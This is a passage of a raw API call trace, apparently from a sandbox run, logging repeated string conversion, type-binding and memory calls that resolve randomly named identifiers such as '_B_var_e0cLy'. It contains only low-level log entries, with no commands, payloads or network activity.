[0060.991] ITypeComp:RemoteBind (in: This=0x87cef08, szName="e0cLy", lHashVal=0x1049a5, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x662 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x662) returned 0x0 [0060.991] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.991] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557164a | out: _Dst=0x87fcc50) returned 0x0 [0060.992] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2332, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_e0cLy") returned 13 [0060.992] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_e0cLy", lHashVal=0x100d92, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.992] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557164a | out: _Dst=0x343ddc) returned 0x0 [0060.992] CRetailMalloc_Free () returned 0x7940201 [0060.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557166e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="Br2LNX1") returned 8 [0060.993] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Br2LNX1", lHashVal=0x10877e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x664 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x664) returned 0x0 [0060.993] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.993] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557166e | out: _Dst=0x87fcc50) returned 0x0 [0060.994] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea235e, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_Br2LNX1") returned 15 [0060.994] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Br2LNX1", lHashVal=0x108b02, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.994] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557166e | out: _Dst=0x343ddc) returned 0x0 [0060.994] CRetailMalloc_Free () returned 0x7940201 [0060.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571692, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="BbcornAY1") returned 10 [0060.995] ITypeComp:RemoteBind (in: This=0x87cef08, szName="BbcornAY1", lHashVal=0x106c36, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x666 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x666) returned 0x0 [0060.995] CRetailMalloc_Alloc () returned 0x87504e0 [0060.995] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571692 | out: _Dst=0x87504e0) returned 0x0 [0060.996] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea238a, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_BbcornAY1") returned 17 [0060.996] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_BbcornAY1", lHashVal=0x10757b, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.996] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571692 | out: _Dst=0x343ddc) returned 0x0 [0060.996] CRetailMalloc_Free () returned 0x1a060101 [0060.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55716ba, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="b9Bei") returned 6 [0060.997] ITypeComp:RemoteBind (in: This=0x87cef08, szName="b9Bei", lHashVal=0x1080a0, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x668 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x668) returned 0x0 [0060.997] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.997] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55716ba | out: _Dst=0x87fcc50) returned 0x0 [0060.997] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea23ba, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_b9Bei") returned 13 [0060.997] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_b9Bei", lHashVal=0x10448d, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.998] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55716ba | out: _Dst=0x343ddc) returned 0x0 [0060.998] CRetailMalloc_Free () returned 0x7940201 [0060.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55716de, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="MMvU7BeJ") returned 9 [0060.998] ITypeComp:RemoteBind (in: This=0x87cef08, szName="MMvU7BeJ", lHashVal=0x10eb42, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x66a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x66a) returned 0x0 [0060.998] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.998] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55716de | out: _Dst=0x87fcc50) returned 0x0 [0060.999] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea23e6, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_MMvU7BeJ") returned 16 [0060.999] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_MMvU7BeJ", lHashVal=0x10c2cb, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.999] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55716de | out: _Dst=0x343ddc) returned 0x0 [0060.999] CRetailMalloc_Free () returned 0x7940201 [0061.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571706, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="LQE0b5D") returned 8 [0061.000] ITypeComp:RemoteBind (in: This=0x87cef08, szName="LQE0b5D", lHashVal=0x10cf46, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x66c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x66c) returned 0x0 [0061.000] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.000] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571706 | out: _Dst=0x87fcc50) returned 0x0 [0061.001] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2412, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_LQE0b5D") returned 15 [0061.001] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_LQE0b5D", lHashVal=0x10d2ca, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.001] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571706 | out: _Dst=0x343ddc) returned 0x0 [0061.001] CRetailMalloc_Free () returned 0x7940201 [0061.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557172a, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="nyvjmR") returned 7 [0061.002] ITypeComp:RemoteBind (in: This=0x87ce890, szName="nyvjmR", lHashVal=0x104c9f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x66e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x66e) returned 0x0 [0061.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557172a, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="nyvjmR") returned 7 [0061.002] ITypeComp:RemoteBind (in: This=0x87ce668, szName="nyvjmR", lHashVal=0x104c9f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x66e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x66e) returned 0x0 [0061.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557172a, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="nyvjmR") returned 7 [0061.002] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="nyvjmR", lHashVal=0x104c9f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x66e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x66e) returned 0x0 [0061.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557172a, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="nyvjmR") returned 7 [0061.003] ITypeComp:RemoteBind (in: This=0x87cef08, szName="nyvjmR", lHashVal=0x104c9f, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x66e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x66e) returned 0x0 [0061.003] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.003] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557172a | out: _Dst=0x87fcc50) returned 0x0 [0061.003] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea243e, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_nyvjmR") returned 14 [0061.004] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_nyvjmR", lHashVal=0x10c748, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.004] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557172a | out: _Dst=0x343ddc) returned 0x0 [0061.004] CRetailMalloc_Free () returned 0x7940201 [0061.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557174e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="kB0AlVZ") returned 8 [0061.004] ITypeComp:RemoteBind (in: This=0x87cef08, szName="kB0AlVZ", lHashVal=0x10a57d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x670 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x670) returned 0x0 [0061.004] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.005] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557174e | out: _Dst=0x87fcc50) returned 0x0 [0061.005] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea246a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_kB0AlVZ") returned 15 [0061.005] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_kB0AlVZ", lHashVal=0x109980, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.005] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557174e | out: _Dst=0x343ddc) returned 0x0 [0061.005] CRetailMalloc_Free () returned 0x7940201 [0061.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571772, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="b7M2Z") returned 6 [0061.006] ITypeComp:RemoteBind (in: This=0x87cef08, szName="b7M2Z", lHashVal=0x102d4a, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x672 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x672) returned 0x0 [0061.006] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.006] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571772 | out: _Dst=0x87fcc50) returned 0x0 [0061.007] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2496, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_b7M2Z") returned 13 [0061.007] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_b7M2Z", lHashVal=0x10f176, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.007] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571772 | out: _Dst=0x343ddc) returned 0x0 [0061.007] CRetailMalloc_Free () returned 0x7940201 [0061.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571796, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="U8ewLmR") returned 8 [0061.008] ITypeComp:RemoteBind (in: This=0x87cef08, szName="U8ewLmR", lHashVal=0x105e80, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x674 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x674) returned 0x0 [0061.008] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.008] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571796 | out: _Dst=0x87fcc50) returned 0x0 [0061.009] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea24c2, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_U8ewLmR") returned 15 [0061.009] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_U8ewLmR", lHashVal=0x106204, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.009] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571796 | out: _Dst=0x343ddc) returned 0x0 [0061.009] CRetailMalloc_Free () returned 0x7940201 [0061.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55717de, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="cDQkaG4Yv") returned 10 [0061.010] ITypeComp:RemoteBind (in: This=0x87cef08, szName="cDQkaG4Yv", lHashVal=0x10fcc3, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x678 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x678) returned 0x0 [0061.010] CRetailMalloc_Alloc () returned 0x87504e0 [0061.010] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55717de | out: _Dst=0x87504e0) returned 0x0 [0061.011] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea24ee, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_cDQkaG4Yv") returned 17 [0061.011] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_cDQkaG4Yv", lHashVal=0x10f687, wFlags=0x3, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.011] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55717de | out: _Dst=0x343ddc) returned 0x0 [0061.011] CRetailMalloc_Free () returned 0x1a060101 [0061.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55717ba, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="UCp4V") returned 6 [0061.012] ITypeComp:RemoteBind (in: This=0x87cef08, szName="UCp4V", lHashVal=0x105602, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x676 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x676) returned 0x0 [0061.012] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.012] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55717ba | out: _Dst=0x87fcc50) returned 0x0 [0061.012] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea251e, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_UCp4V") returned 13 [0061.013] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_UCp4V", lHashVal=0x1019ef, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.013] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55717ba | out: _Dst=0x343ddc) returned 0x0 [0061.013] CRetailMalloc_Free () returned 0x7940201 [0061.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571806, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="LMQ1YPH") returned 8 [0061.013] ITypeComp:RemoteBind (in: This=0x87cef08, szName="LMQ1YPH", lHashVal=0x107a75, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x67a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x67a) returned 0x0 [0061.013] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.014] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571806 | out: _Dst=0x87fcc50) returned 0x0 [0061.014] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea254a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_LMQ1YPH") returned 15 [0061.014] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_LMQ1YPH", lHashVal=0x107df9, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.014] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571806 | out: _Dst=0x343ddc) returned 0x0 [0061.014] CRetailMalloc_Free () returned 0x7940201 [0061.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557182a, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="fbVWuCgZy") returned 10 [0061.015] ITypeComp:RemoteBind (in: This=0x87cef08, szName="fbVWuCgZy", lHashVal=0x107091, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x67c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x67c) returned 0x0 [0061.015] CRetailMalloc_Alloc () returned 0x87504e0 [0061.015] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x557182a | out: _Dst=0x87504e0) returned 0x0 [0061.016] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2576, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_fbVWuCgZy") returned 17 [0061.016] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_fbVWuCgZy", lHashVal=0x1079d6, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.016] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x557182a | out: _Dst=0x343ddc) returned 0x0 [0061.016] CRetailMalloc_Free () returned 0x1a060101 [0061.016] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557187a | out: _Dst=0x87fcc50) returned 0x0 [0061.017] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557187a | out: _Dst=0x343ddc) returned 0x0 [0061.017] CRetailMalloc_Free () returned 0x7940201 [0061.017] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571852 | out: _Dst=0x87504e0) returned 0x0 [0061.017] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571852 | out: _Dst=0x343ddc) returned 0x0 [0061.017] CRetailMalloc_Free () returned 0x1a060101 [0061.017] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557189e | out: _Dst=0x87fcc50) returned 0x0 [0061.018] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557189e | out: _Dst=0x343ddc) returned 0x0 [0061.018] CRetailMalloc_Free () returned 0x7940201 [0061.018] CRetailMalloc_Realloc () returned 0x87cc360 [0061.018] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55718c2 | out: _Dst=0x87fcc50) returned 0x0 [0061.018] 